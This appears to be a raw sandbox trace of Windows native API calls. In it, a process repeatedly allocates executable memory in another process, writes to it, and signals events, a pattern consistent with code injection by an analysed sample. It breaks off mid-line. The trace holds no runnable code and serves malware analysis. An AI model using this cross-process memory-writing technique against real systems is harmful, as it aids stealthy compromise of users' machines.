NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.019] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.019] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.019] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.019] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a290, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.020] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.020] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.020] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.020] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.020] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.020] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.020] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.020] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.021] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.021] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.021] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.021] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.021] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a298, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.021] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.021] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.021] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.022] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.022] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.022] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.022] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.022] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.022] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.022] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.022] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.022] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.023] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2a0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.023] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.023] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.023] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.023] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.023] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.023] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.023] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.024] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.024] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.024] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.024] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.024] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.024] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2a8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.024] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.024] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.025] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.025] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.025] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.025] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.025] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.025] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.025] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.025] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.025] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.026] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.026] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2b0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.026] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.026] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.026] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.026] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.026] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.026] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.026] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.027] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.027] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.027] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.027] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.027] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.027] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2b8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.027] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.027] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.028] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.028] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.028] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.028] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.028] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.028] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.028] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.029] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.029] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.029] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.029] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2c0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.029] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.029] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.029] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.030] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.030] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.030] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.030] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.030] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.030] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.030] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.030] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.031] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.031] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2c8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.031] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.031] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.031] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.031] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.031] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.032] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.032] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.032] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.032] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.032] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.032] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.032] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.032] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2d0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.032] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.033] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.033] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.033] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.033] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.033] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.033] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.033] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.033] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.034] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.034] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.034] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.034] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2d8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.034] NtProtectVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e0c0*=0x140001000, 